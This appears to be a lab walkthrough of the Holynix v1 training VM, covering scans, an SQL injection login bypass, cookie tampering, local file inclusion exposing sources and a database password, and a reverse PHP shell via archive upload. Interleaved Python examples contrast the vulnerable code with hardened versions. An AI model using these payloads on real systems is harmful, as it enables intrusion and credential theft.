Sunday, 10 November 2013

Holynix -1 (Scanning + Enumeration)

Preparation:
Download : http://vulnhub.com/entry/holynix_v1,20/
MAC address : findstr "ethernet0.g" holynix.vmx
ethernet0.generatedAddress = "00:0c:29:bc:05:de"
ethernet0.generatedAddressOffset = "0"
VirtualBox: new machine, Host Only network, change the MAC address to 000c29bc05de

Scanning:
1. Checking live systems
netdiscover -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                      
                                                                                                                                                    
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                    
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                  
 -----------------------------------------------------------------------------
 192.168.56.1    08:00:27:00:9c:e8    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.100  08:00:27:a5:50:60    01    060   CADMUS COMPUTER SYSTEMS                                                                           
 192.168.56.102  00:0c:29:bc:05:de    01    060   VMware, Inc.      

 2. Check open ports
unicornscan 192.168.56.102
TCP open                http[   80]        from 192.168.56.102  ttl 64
 3. Fingerprint the OS & services
nmap -sV -sS -O 192.168.56.102 -pT:80
Starting Nmap 6.40 ( http://nmap.org ) at 2013-11-09 14:22 CET
Nmap scan report for 192.168.56.102
Host is up (0.00086s latency).
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (99%), Linux 2.6.35 (95%), Linux 2.6.22 (SPARC) (95%), Linux 2.6.9 - 2.6.33 (94%), Linux 2.6.22 (embedded, ARM) (93%), Linux 2.6.16 (93%), Linksys WRV54G WAP (93%), Linux 2.6.18 - 2.6.24 (93%), ipTIME PRO 54G WAP (93%), Android 4.0.4 (Linux 2.6) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.33 seconds
 4. Scan for vulnerabilities
 nikto -host 192.168.56.102
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2013-11-09 14:25:53 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ PHP/5.2.4-2ubuntu5.12 appears to be outdated (current is at least 5.4.4)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-2562: /login/sm_login_screen.php?error=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2562: /login/sm_login_screen.php?uid=\">: SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3092: /home/: This might be interesting...
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 13372, size: 5108, mtime: 0x438c0358aae80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHP include error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHP include error may indicate local or remote file inclusion is possible.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2013-11-09 14:26:06 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

 dirb http://192.168.56.102/
-----------------
DIRB v2.03   
By The Dark Raver
-----------------

START_TIME: Sat Nov  9 14:27:06 2013
URL_BASE: http://192.168.56.102/
WORDLIST_FILES: wordlists/common.txt

-----------------

GENERATED WORDS: 1942                                                         
                                                                              
---- Scanning URL: http://192.168.56.102/ ----
+ http://192.168.56.102/cgi-bin/                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/footer                                                
    (FOUND: 200 [Ok] - Size: 63)
+ http://192.168.56.102/header                                                
    (FOUND: 200 [Ok] - Size: 604)
+ http://192.168.56.102/home                                                  
    (FOUND: 200 [Ok] - Size: 109)
+ http://192.168.56.102/img/                                                  
    ==> DIRECTORY
+ http://192.168.56.102/index                                                 
    (FOUND: 200 [Ok] - Size: 776)
+ http://192.168.56.102/login                                                 
    (FOUND: 200 [Ok] - Size: 342)
+ http://192.168.56.102/misc/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/transfer                                              
    (FOUND: 200 [Ok] - Size: 44)
+ http://192.168.56.102/upload/                                               
    ==> DIRECTORY
+ http://192.168.56.102/~bin/                                                 
    ==> DIRECTORY
+ http://192.168.56.102/~mail/                                                
    ==> DIRECTORY
+ http://192.168.56.102/~sys/                                                 
    ==> DIRECTORY
                                                                              
---- Entering directory: http://192.168.56.102/img/ ----
+ http://192.168.56.102/img/index                                             
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/misc/ ----
+ http://192.168.56.102/misc/index                                            
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/upload/ ----
+ http://192.168.56.102/upload/index                                          
    (FOUND: 200 [Ok] - Size: 26)
                                                                              
---- Entering directory: http://192.168.56.102/~bin/ ----
+ http://192.168.56.102/~bin/cat                                              
    (FOUND: 200 [Ok] - Size: 27312)
+ http://192.168.56.102/~bin/cp                                               
    (FOUND: 200 [Ok] - Size: 71664)
+ http://192.168.56.102/~bin/date                                             
    (FOUND: 200 [Ok] - Size: 55820)
+ http://192.168.56.102/~bin/dir                                              
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/ip                                               
    (FOUND: 200 [Ok] - Size: 183288)
+ http://192.168.56.102/~bin/login                                            
    (FOUND: 200 [Ok] - Size: 35272)
+ http://192.168.56.102/~bin/ls                                               
    (FOUND: 200 [Ok] - Size: 92376)
+ http://192.168.56.102/~bin/more                                             
    (FOUND: 200 [Ok] - Size: 27752)
+ http://192.168.56.102/~bin/mount                                            
    (FOUND: 200 [Ok] - Size: 81368)
+ http://192.168.56.102/~bin/mt                                               
    (FOUND: 200 [Ok] - Size: 28492)
+ http://192.168.56.102/~bin/netstat                                          
    (FOUND: 200 [Ok] - Size: 101228)
+ http://192.168.56.102/~bin/ping                                             
    (FOUND: 200 [Ok] - Size: 30856)
+ http://192.168.56.102/~bin/ps                                               
    (FOUND: 200 [Ok] - Size: 65360)
+ http://192.168.56.102/~bin/pwd                                              
    (FOUND: 200 [Ok] - Size: 27252)
+ http://192.168.56.102/~bin/tar                                              
    (FOUND: 200 [Ok] - Size: 234132)
                                                                              
---- Entering directory: http://192.168.56.102/~mail/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/ ----
+ http://192.168.56.102/~sys/console                                          
    (FOUND: 403 [Forbidden] - Size: 334)
+ http://192.168.56.102/~sys/core                                             
    (FOUND: 403 [Forbidden] - Size: 331)
+ http://192.168.56.102/~sys/disk/                                            
    ==> DIRECTORY
+ http://192.168.56.102/~sys/full                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/input/                                           
    ==> DIRECTORY
+ http://192.168.56.102/~sys/log                                              
    (FOUND: 403 [Forbidden] - Size: 330)
+ http://192.168.56.102/~sys/net/                                             
    ==> DIRECTORY
+ http://192.168.56.102/~sys/null                                             
    (FOUND: 200 [Ok] - Size: 0)
+ http://192.168.56.102/~sys/random                                           
    (FOUND: 200 [Ok] - Size: 0)
                                                                              
---- Entering directory: http://192.168.56.102/~sys/disk/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/input/ ----
                                                                              
---- Entering directory: http://192.168.56.102/~sys/net/ ----
                                                                              
-----------------
DOWNLOADED: 19420 - FOUND: 31
 Enumeration
 4. Enumerate services
 Mantra http://192.168.56.102
 5. Input fields
 index.php?page=login.php
 6. Break the login procedure
Enable HackBar, enable post data, load URL
user_name=admin&password=' or (1=1)#&Submit_button=Submit
 7. Enumeration
View page source
 - ?page=employeedir.php
 - ?page=messageboard.php
 - ?page=calender.php
 - ?page=upload.php
 - ?page=ssp.php
 - ?do=logout
 8. Identification
Cookie: uid=1
Cookies Manager: edit uid to 1,2,3,4,5,6,7,8,9,10,11
 9. More enumeration
employeedir.php
 - img/blabla.jpg
 - email addresses, usernames?
messageboard.php
 - knockknock
 - Changetrack
calender.php
 - nothing
upload.php
 - file upload to somewhere
 - transfer.php
ssp.php
 - Local File Inclusion error
 - text_file_name=ssp%2Femail.txt&B=Display+File
fimap -s -b --cookie="uid=2" --post="text_file_name=ssp%2Femail.txt&B=Display+File" -u "http://192.168.56.102/index.php?page=ssp.php"
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

Blind FI-error checking enabled.
SingleScan is testing URL: 'http://192.168.56.102/index.php?page=ssp.php'
[15:32:43] [OUT] Inspecting URL 'http://192.168.56.102/index.php?page=ssp.php'...
[15:32:43] [INFO] Fiddling around with URL...
[15:32:43] [INFO] Sniper failed. Going blind...
[15:32:44] [OUT] Possible file inclusion found blindly! -> 'http://192.168.56.102/index.php?page=ssp.php' with POST-Parameter 'text_file_name'.
[15:32:44] [OUT] Identifying Vulnerability 'http://192.168.56.102/index.php?page=ssp.php' with Parameter 'text_file_name' blindly...
[15:32:44] [WARN] Unknown language - Autodetecting...
[15:32:44] [INFO] Autodetect thinks this could be a PHP-Script...
[15:32:44] [INFO] If you think this is wrong start fimap with --no-auto-detect
[15:32:44] [INFO] Testing file '/etc/passwd'...
[15:32:44] [INFO] Testing file '/proc/self/environ'...
[15:32:44] [INFO] Testing file 'php://input'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access.log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access.log'...
[15:32:44] [INFO] Testing file '/var/log/apache2/access_log'...
[15:32:44] [INFO] Testing file '/var/log/apache/access_log'...
[15:32:44] [INFO] Testing file '/var/log/httpd/access_log'...
[15:32:44] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##################################################################
#[1] Possible PHP-File Inclusion                                 #
##################################################################
#::REQUEST                                                       #
#  [URL]        http://192.168.56.102/index.php?page=ssp.php     #
#  [POST]       text_file_name=ssp%2Femail.txt&B=Display+File    #
#  [HEAD SENT]  Cookie                                           #
#::VULN INFO                                                     #
#  [POSTPARM]   text_file_name                                   #
#  [PATH]       Not received (Blindmode)                         #
#  [OS]         Unix                                             #
#  [TYPE]       Blindly Identified                               #
#  [TRUNCATION] Not tested.                                      #
#  [READABLE FILES]                                              #
#                   [0] /etc/passwd                              #
##################################################################
 - text_file_name=/etc/passwd&B=Display+File
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash
Error message: text_file_name=ssp%2a&B=Display+File
Warning:  fopen(ssp*) [function.fopen]: failed to open stream: No such file or directory in /var/apache2/htdocs/ssp.php on line 29

Warning:  stream_get_contents() expects parameter 1 to be resource, boolean given in /var/apache2/htdocs/ssp.php on line 30

Warning:  fclose(): supplied argument is not a valid stream resource in /var/apache2/htdocs/ssp.php on line 31
ssp.php : text_file_name=ssp.php&B=Display+File

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2>";
} else {
    echo "<center><h4><b>Standard Security Practices</b></h4></center><p>";
    echo "<form method=\"POST\" action=\"" . $_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING'] . "\">";

    echo "<p><select size=\"1\" name=\"text_file_name\">";
    echo "<option value=\"ssp/email.txt\">Email";
    echo "</option>";
    echo "<option value=\"ssp/acceptable_use.txt\">Acceptable Use";
    echo "</option>";
    echo "<option value=\"ssp/internet_use.txt\">Internet Use";
    echo "</option>";
    echo "<option value=\"ssp/software_installation.txt\">Software Installation";
    echo "</option>";
    echo "<option value=\"ssp/malware.txt\">Malware";
    echo "</option>";
    echo "<option value=\"ssp/auditing.txt\">Auditing";
    echo "</option>";
    echo "</select></p>";
    echo "<p><input value=\"Display File\" name=\"B\" type=\"submit\"></p>";
    echo "</form>";
    echo "<pre>";

    // the request value is used as the path with no check at all (this is the LFI)
    $textfilename=$_REQUEST["text_file_name"];

    if ($textfilename <> "") {
        $handle = fopen($textfilename, "r");
        echo stream_get_contents($handle);
        fclose($handle);
    }
    echo "</pre>";
}
?>
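
An added example, not code from the Holynix VM: a Python model of the file-display step in ssp.php (`fopen($_REQUEST["text_file_name"])`) next to a hardened resolver that serves only the six policy documents the form offers. The document root, policy file and `../config.inc` are constructed in a temporary directory.

```python
"""Python model of ssp.php's file display: the original behaviour beside a
resolver that allow-lists the form's option values and confines the read to
docroot/ssp. Everything on disk here is constructed for the demo."""
import os
import tempfile
from typing import Optional

# The option values that ssp.php's <select> offers (copied from its source).
ALLOWED_FILES = (
    "ssp/email.txt", "ssp/acceptable_use.txt", "ssp/internet_use.txt",
    "ssp/software_installation.txt", "ssp/malware.txt", "ssp/auditing.txt",
)


def resolve_vulnerable(docroot: str, text_file_name: str) -> str:
    """ssp.php as written: the request value is the path, relative to the
    script's directory, and nothing is checked."""
    return os.path.join(docroot, text_file_name)


def resolve_hardened(docroot: str, text_file_name: str) -> Optional[str]:
    """Accept only an allow-listed name, and additionally require that the
    resolved path still lies under docroot/ssp, so a symlink under ssp/ cannot
    carry the read outside that directory. None means refuse (400/403)."""
    if text_file_name not in ALLOWED_FILES:
        return None
    base = os.path.realpath(os.path.join(docroot, "ssp")) + os.sep
    target = os.path.realpath(os.path.join(docroot, text_file_name))
    if not target.startswith(base):
        return None
    return target


def display_file(docroot: str, text_file_name: str, hardened: bool) -> Optional[str]:
    """Return the body the page would echo inside <pre>, or None."""
    if hardened:
        path = resolve_hardened(docroot, text_file_name)
    else:
        path = resolve_vulnerable(docroot, text_file_name)
    if path is None:
        return None
    try:
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    except OSError:
        # the equivalent of the fopen() warning the page shows for "ssp*"
        return None


def build_demo_docroot() -> str:
    """Constructed stand-in for /var/apache2/htdocs: one policy text, the
    ssp.php script itself, and a config.inc one level above the web root."""
    root = tempfile.mkdtemp(prefix="holynix-demo-")
    docroot = os.path.join(root, "htdocs")
    os.makedirs(os.path.join(docroot, "ssp"))
    with open(os.path.join(docroot, "ssp", "email.txt"), "w") as fh:
        fh.write("Email policy (constructed)\n")
    with open(os.path.join(docroot, "ssp.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for ssp.php */ ?>\n")
    with open(os.path.join(root, "config.inc"), "w") as fh:
        fh.write("<?php $dbpass = 'constructed-secret'; ?>\n")
    return docroot


if __name__ == "__main__":
    d = build_demo_docroot()
    for name in ("ssp/email.txt", "../config.inc", "ssp.php", "/etc/passwd"):
        print(f"{name:16} vulnerable={display_file(d, name, False) is not None} "
              f"hardened={display_file(d, name, True) is not None}")
```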
index.php : text_file_name=index.php&B=Display+File
<?php
include ("header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") { include ("home.php"); }
else {
        $query = "SELECT location FROM page WHERE location = '". $page ."'";
        $result = mysql_query($query);
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        if ( file_exists($row{'location'}) ) { include($row{'location'}); } else { include("404.html"); }

}
include ("footer.php");
?>

home.php


<?php
if ( $auth == 0 ) { echo "<center><h3>You must login to access restricted content</h3>"; }
if ( $auth == 1 ) { echo "<center><h3>Welcome to the Nakimura Industries Production Server</h3></center>"; }

?>

login.php :

<?php
if ($failedloginflag==1) {
    echo '<h2><font color="#ff0000">Bad user name or password!</font>';
    echo "If you continue to have problems logging in contact<br>the system administrator at ltorvalds@example.net<br><br>";
}
echo "<form method=\"POST\" action=\"" . $_SERVER['SCRIPT_NAME'] . "?" . $_SERVER['QUERY_STRING'] . "\">";
?>
    <p>Enter your username and password:</p>
    <p>Name:<br><input name="user_name" size="20" type="text"></p>
    <p>Password:<br><input name="password" size="20" type="password"></p>
    <p><input value="Submit" name="Submit_button" type="submit"></p>
</form>
<?php
?>

header.php
header.php could not be retrieved the normal way, so I printed it out with the help of WebScarab.
The essential and important parts of it concerning authentication were:
<?php
include '../config.inc';
include '../opendb.inc';

// Grab inputs
$username = $_REQUEST["user_name"];
$password = $_REQUEST["password"];
$surname = $_REQUEST["surname"];
$dosomething = $_REQUEST["do"];

if ($username <> "" and $password <> "") {
    $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
    $result = mysql_query($query) or die('<b>SQL Error:</b>' . mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);
    if (mysql_num_rows($result) > 0) {
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        setcookie("uid", $row['cid']);
        $failedloginflag=0;
        echo '<meta http-equiv="refresh" content="0;url=index.php">';
    } else {
        $failedloginflag=1;
    }
}

switch ($dosomething) {
    case "logout":
        setcookie('uid','',1);
        break;
}

?>
<html><head>
<?php
if ($dosomething  == "logout") {
    echo '<meta http-equiv="refresh" content="0;url=index.php">';
    $auth = 0;
}
?>
</head>
<body bgcolor="#00bbcc">
<table border="0" width="100%" cellspacing="0" cellpadding="0">
    <tr><td bgcolor="#00bbcc"align="center" colspan="2">
        <table width="100%">
        <td valign="top"><br></td>
        <td align="center" valign="top"><h1><b>Nakimura Industries Production Server</b></h1>
        <?php
        $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
        $result = mysql_query($query) or die('Error Connecting to Database');
        echo mysql_error($conn);
        echo mysql_error($conn);
        if (mysql_num_rows($result) > 0) {
            while($row = mysql_fetch_array($result, MYSQL_ASSOC))
            {
                $logged_in_user = $row['username'];
                $upload = $row['upload'];
                $auth = 1;
                echo "Welcome, " .$logged_in_user. ".";
            }
        } else {
            $logged_in_user = "anonymous";
            $auth = 0;
            echo '<font color="#ff0000">Not logged in</font>';
        }
        ?>
        </td>
        </table>
    </td></tr>
    <tr>
        <td bgcolor="#00bbcc" valign="top" width="12%">
        <hr>
        <a href="index.php">Home</a><br>
        <?php
        if ( $auth == 0 ) { echo "<a href='?page=login.php'>Login</a><br />"; }
        if ( $auth == 1 ) {
            echo "<a href='?page=employeedir.php'>Directory</a><br />";
            echo "<a href='?page=messageboard.php'>Message Board</a><br />";
            echo "<a href='?page=calender.php'>Calender</a><br />";
            echo "<a href='?page=upload.php'>Upload</a><br />";
            echo "<a href='?page=ssp.php'>Security</a><br />";
            echo "<a href='?do=logout'>Logout</a><br />";
        }
        ?>
        <hr>
        </td>
        <td  valign="top" width="80%">
        <blockquote>
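
An added example, not code from the Holynix VM: a Python model of the uid cookie that header.php issues with `setcookie("uid", $row['cid'])` and later trusts as the lookup key for the current account, beside an HMAC-signed variant. The cookie format and the server secret are assumptions of this example.

```python
"""Model of header.php's uid cookie. The bare-integer cookie lets anyone
become any account by editing the value (the page's step 8); the signed
variant binds the value to a server-side secret. Secret is constructed."""
import hashlib
import hmac
import secrets
from typing import Callable, List, Optional

# Constructed server-side secret. In a real deployment it lives outside the
# web root and never reaches the client.
COOKIE_SECRET = secrets.token_bytes(32)


def issue_cookie_vulnerable(cid: int) -> str:
    """header.php as written: the cookie value is the bare account id."""
    return str(cid)


def current_cid_vulnerable(cookie: str) -> Optional[int]:
    """header.php as written: whatever uid the client presents is believed."""
    return int(cookie) if cookie.isdigit() else None


def _sign(cid_str: str, secret: bytes) -> str:
    return hmac.new(secret, cid_str.encode(), hashlib.sha256).hexdigest()


def issue_cookie_signed(cid: int, secret: bytes = COOKIE_SECRET) -> str:
    """Hardened: value is '<cid>.<hex HMAC-SHA256 over cid>'."""
    cid_str = str(cid)
    return f"{cid_str}.{_sign(cid_str, secret)}"


def current_cid_signed(cookie: str, secret: bytes = COOKIE_SECRET) -> Optional[int]:
    """Return the cid only if its tag verifies; None means 'Not logged in'."""
    cid_str, sep, tag = cookie.partition(".")
    if not sep or not cid_str.isdigit():
        return None
    # constant-time comparison so the tag cannot be guessed byte by byte
    if not hmac.compare_digest(_sign(cid_str, secret), tag):
        return None
    return int(cid_str)


def tamper_sweep(cookie: str, reader: Callable[[str], Optional[int]]) -> List[int]:
    """Replay the page's step 8 (edit uid to 1..11 in a cookie editor) against
    a cookie reader and report which identities the server would accept."""
    _, sep, tag = cookie.partition(".")
    accepted = []
    for cid in range(1, 12):
        forged = f"{cid}.{tag}" if sep else str(cid)
        got = reader(forged)
        if got is not None:
            accepted.append(got)
    return accepted


if __name__ == "__main__":
    print("bare uid accepts:", tamper_sweep(issue_cookie_vulnerable(2), current_cid_vulnerable))
    print("signed uid accepts:", tamper_sweep(issue_cookie_signed(2), current_cid_signed))
```

The signed value is still a bearer token, so the usual production choice is a random server-side session id looked up in a session store, sent with HttpOnly and Secure set.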

../config.inc

<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'mY5qLr007p@S5w0rD';
$dbname = 'creds';

?>
../opendb.inc

<?php
$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die('Error connecting to mysql');
mysql_select_db($dbname) or die('Error Opening DatabaseSQL Error:' . mysql_error($conn) . 'SQL Statement:' . $query);
?>

upload.php : text_file_name=upload.php&B=Display+File

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2>";
} else {
    echo "<h3>Home Directory Uploader</h3>";
    echo "<form enctype=\"multipart/form-data\" action=\"index.php?page=transfer.php\" method=\"POST\">";
    echo "Please choose a file: <input name=\"uploaded\" type=\"file\"><br>";
    echo "<input name=\"autoextract\" value=\"true\" type=\"checkbox\"> Enable the automatic extraction of gzip archives.<br>";
    echo "<input value=\"Upload\" type=\"submit\"></form>";
}
?>
transfer.php

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        // the MIME type is supplied by the client, so the autoextract branch is client-selectable
        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {    $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href=\"?index.php?page=upload.php\">Back to upload page</a>";
        } else {
            if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br>";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br><a href=\"?page=upload.php\">Back to upload page</a>";
                if ( $command == 1 )
                {
                    // the archive is unpacked as root straight into the user's home directory
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
            } else {
                echo "Sorry, there was a problem uploading your file.<br>";
                echo "<br><a href=\"?page=upload.php\">Back to upload page</a>";
            }
        }
    } else { echo "<br><br><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>
update_own
#!/bin/bash
sudo chown root:root /home/
sudo chown -R alamo:developers /home/alamo/
sudo chown -R nobody:developers /home/development/
sudo chown -R etenenbaum:users /home/etenenbaum/
sudo chown -R gmckinnon:users /home/gmckinnon/
sudo chown -R hreiser:staff /home/hreiser/
sudo chown -R jdraper:users /home/jdraper/
sudo chown -R jjames:staff /home/jjames/
sudo chown -R jljohansen:developers /home/jljohansen/
sudo chown -R kpoulsen:users /home/kpoulsen/
sudo chown -R ltorvalds:admin /home/ltorvalds/
sudo chown -R mrbutler:staff /home/mrbutler/
sudo chown -R rtmorris:users /home/rtmorris/

Exploit (reverse php shell)
nc -l -v -p 1234
listening on [any] 1234 ...
Set Cookie: uid=2
pico revshell.php
$ip = '192.168.56.101';  // CHANGE THIS
tar cvzf revshell.tar.gz revshell.php
upload revshell.tar.gz
http://192.168.56.102/~etenenbaum/revshell.php
192.168.56.102: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 58391
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 14:58:25 up  5:07,  0 users,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$
$ ls /etc/knockknock.d/profiles
alamo
etenenbaum
gmckinnon
hreiser
jdraper
jjames
jljohansen
kpoulsen
ltorvalds
mrbutler
rtmorris
$ ls /etc/knockknock.d/profiles/etenenbaum -al
total 24
drwxr-xr-x  2 root root 4096 Dec  1  2009 .
drwxr-xr-x 13 root root 4096 Nov  8  2010 ..
-rw-r--r--  1 root root   25 Dec  1  2009 cipher.key
-rw-r--r--  1 root root   27 Dec  1  2009 config
-rw-r--r--  1 root root    3 Nov 18 19:02 counter
-rw-r--r--  1 root root   25 Dec  1  2009 mac.key

$ cat /etc/knockknock.d/profiles/etenenbaum/*
WC8pOHq67KHzuYEvH9qPRA==  <- cipher.key
[main]  <- config
knock_port = 13821
32 <- counter
OcOlArxJEvH7iecDOZGAmw== <- mac.key

Exploit (sql injection)


index.php:
   $query = "SELECT location FROM page WHERE location = '". $page ."'";
header.php:
   $query  = "SELECT * FROM accounts WHERE username='". $username ."' AND password='".stripslashes($password)."'";
  $query  = "SELECT * FROM accounts WHERE cid='".$_COOKIE["uid"]."'";
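
An added example, not code from the Holynix VM: a sqlite3 model of the header.php login query above with the page's payload in the password field, beside a parameterised version. sqlite has no `#` line comment, so the executed payload uses the ANSI `-- ` comment, which has the same effect in MySQL; the account rows are constructed, not the dump.

```python
"""Model of the header.php login query. login_vulnerable builds the SQL by
concatenation exactly as header.php does (and stripslashes() there removes
any backslash escaping first); login_parameterised uses placeholders."""
import sqlite3
from typing import Optional

# Same columns as creds.accounts in the sqlmap dump; values are made up.
ACCOUNTS = [
    (1, 0, "alamo", "constructed-pw-1"),
    (2, 1, "etenenbaum", "constructed-pw-2"),
]

# The payload the page types into the password field with HackBar.
PAGE_PAYLOAD = "' or (1=1)#"
# The same idea spelled with the '-- ' comment that sqlite (and MySQL) accept.
SQLITE_PAYLOAD = "' or (1=1)-- "


def open_db() -> sqlite3.Connection:
    """In-memory table; cid as PRIMARY KEY so a full scan returns cid order."""
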